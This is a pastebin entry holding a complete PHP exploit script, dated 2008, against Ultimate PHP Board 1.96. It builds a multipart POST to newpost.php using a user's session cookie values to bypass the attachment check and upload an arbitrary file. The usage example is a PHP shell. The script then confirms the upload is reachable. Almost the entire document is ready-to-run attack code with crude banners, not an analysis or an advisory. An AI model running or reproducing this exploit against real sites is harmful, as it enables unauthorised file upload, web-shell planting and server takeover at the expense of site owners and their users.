NoPaste Service
DOWNLOAD
Language: PHP
Author: Matrix86
Description: UPB 1.96 Remote Upload File
Date: 22/09/08 10:48
  1. <?php
  2. ini_set("max_execution_time",0);
  3. ini_set("default_socket_timeout",4);
  4. /*
  5.  *  AUTHOR :    Matrix86
  6.  *  Contact:    matrix86 [AT ] tuxmealux [ DOT] net
  7.  *  CMS:                UPB (Ultimate Php Board)
  8.  *  Bug:                Forum Post attachment check bypass
  9.  *  
  10.  *  W la pizza! E la figa!!
  11.  *
  12.  * Note:
  13.  *              This exploit required a valid user with user id, encrypted password,
  14.  *              and other data. Look your cookie for this:
  15.  *              pass_env
  16.  *              user_env
  17.  *              id_env
  18.  *              power_env
  19.  */
  20.  
  21. function banner(){
  22.         echo "\n*****************************************************\n";
  23.         echo "*    UPB (Ultimate Php Board)     vers. 1.96            *\n";
  24.         echo "*    Forum Post attachment check bypass             *\n";
  25.         echo "*****************************************************\n";
  26.         echo "* Author: Matrix86                                  *\n";
  27.         echo "* Site:   http://www.tuxmealux.net                  *\n";
  28.         echo "*                                                   *\n";
  29.         echo "* W the pizza! And the italian girls!!              *\n";
  30.         echo "*****************************************************\n\n";
  31. }
  32.  
  33. function makePkt(){
  34.         global $host, $port, $path, $file, $userid, $pwd, $username, $power;
  35.        
  36.         $CRLF = "\r\n";
  37.         $boundary = "-------------------------------".time().time();
  38.         $body = "--".$boundary."\r\n";
  39.         $body .= "Content-Disposition: form-data; name=\"u_name\"\r\n";
  40.         $body .= "\r\n";
  41.         $body .= $username."\r\n";
  42.         $body .= "--".$boundary."\r\n";
  43.         $body .= "Content-Disposition: form-data; name=\"subject\"\r\n";
  44.         $body .= "\r\n";
  45.         $body .= "Sorry...Matrix86 has you!\r\n";
  46.         $body .= "--".$boundary."\r\n";
  47.         $body .= "Content-Disposition: form-data; name=\"icon\"\r\n";
  48.         $body .= "\r\n";
  49.         $body .= "icon11.gif\r\n";
  50.         $body .= "--".$boundary."\r\n";
  51.         $body .= "Content-Disposition: form-data; name=\"message\"\r\n";
  52.         $body .= "\r\n";
  53.         $body .= "Sorry...Matrix86 has you!\r\n";
  54.         $body .= "--".$boundary."\r\n";
  55.         $body .= "Content-Disposition: form-data; name=\"file\"; filename=\"".$file."\"\r\n";
  56.         $body .= "Content-Type: image/gif\r\n";
  57.         $body .= "\r\n";
  58.         $body .= file_get_contents($file)."\r\n";
  59. //      $body .= "--".$boundary."\r\n";
  60. //      $body .= "Content-Disposition: form-data; name=\"submit\"\r\n";
  61. //      $body .= "\r\n\r\n";
  62.         $body .= "--".$boundary."--\r\n";
  63.        
  64.         $packet  = "POST ".$path."newpost.php?id=1&a=1&t=1&t_id=&page=1&power_env=".$power."&user_env=".$username."&id_env=".$userid."&pass_env=".$pwd." HTTP/1.0\r\n";
  65.         $packet .= "Host: ".$host."\r\n";
  66.         $packet .= "User-Agent: Fuck Browser 2.1\r\n";
  67.         $packet .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
  68.         $packet .= "Content-Length: ".strlen($body)."\r\n";
  69.         $packet .= "Connection: Close\r\n";
  70.         $packet .= "Cookie: pass_env=".$pwd."; user_env=".$username."; id_env=".$userid."; power_env=".$power.";\r\n";
  71.         $packet .= "\r\n";
  72.         $packet .= $body;
  73.        
  74.         //echo $packet;
  75.        
  76.         return $packet;
  77. }
  78.  
  79. function sendPkt($packet) {
  80.         global $host, $port, $path, $file, $userid, $pwd, $username, $power;
  81.        
  82.         $ip = gethostbyname( $host );
  83.         if( stristr( $host, $ip ) ) return FALSE;
  84.        
  85.         echo "[*] Ip host: ".$ip."\n";
  86.        
  87.         if( !( $sock = fsockopen( $ip, $port ) ) ) return FALSE;
  88.         echo "[*] Connection done\n";
  89.         echo "[*] Sending data\n";
  90.        
  91.         fputs( $sock, $packet );
  92.        
  93.         echo "[*] Waiting for a response\n";
  94.        
  95.         $response = "";
  96.         while ( !feof( $sock ) ) {
  97.                 $response .= fgets ( $sock, 128 );
  98.         }
  99.         fclose( $sock );
  100.        
  101.         return $response;
  102. }
  103.  
  104.  
  105. banner();
  106.  
  107. if($argc < 4) die("Usage: ".$argv[0]." [site] [path] [id_env] [user_env] [pass_env] [power_env] [uploadfile]\n\tExample: ".$argv[0]." http://127.0.0.1 /upb/ 34 fuckyou wfwf323 1 shell.php\n");
  108.  
  109.  
  110. $host     = $argv[1];
  111. $path     = $argv[2];
  112. $userid   = $argv[3];
  113. $username = $argv[4];
  114. $pwd      = $argv[5];
  115. $power    = $argv[6];
  116. $file     = $argv[7];
  117. $port     = 80;
  118.  
  119.  
  120. if( strstr( $host, "http://" ) ) $host = substr( $host, 7 );
  121.  
  122. $pkt = makePkt();
  123. $ris = sendPkt( $pkt );
  124. echo $ris;
  125.  
  126.  
  127. if( $ris != FALSE ) {
  128.         echo "[*] Response received!\n";
  129.        
  130.         $uploaded_file = "http://".$host.$path."uploads/".$file;
  131.        
  132.         $ris =file_get_contents($uploaded_file);
  133.         $ris1 = substr( $ris, 0, 15);
  134.         if( ($ris != FALSE) && (!stristr( $ris1, "404" )) ) echo "\n[@] Exploit succeed! Look at ".$uploaded_file."\n";
  135.         else echo "\n[X] Sorry...Exploit Failed!\n";
  136. }
  137. else echo "\n[X] Sorry...Exploit Failed! Sending error!\n";
  138. die();
  139.  
  140. ?>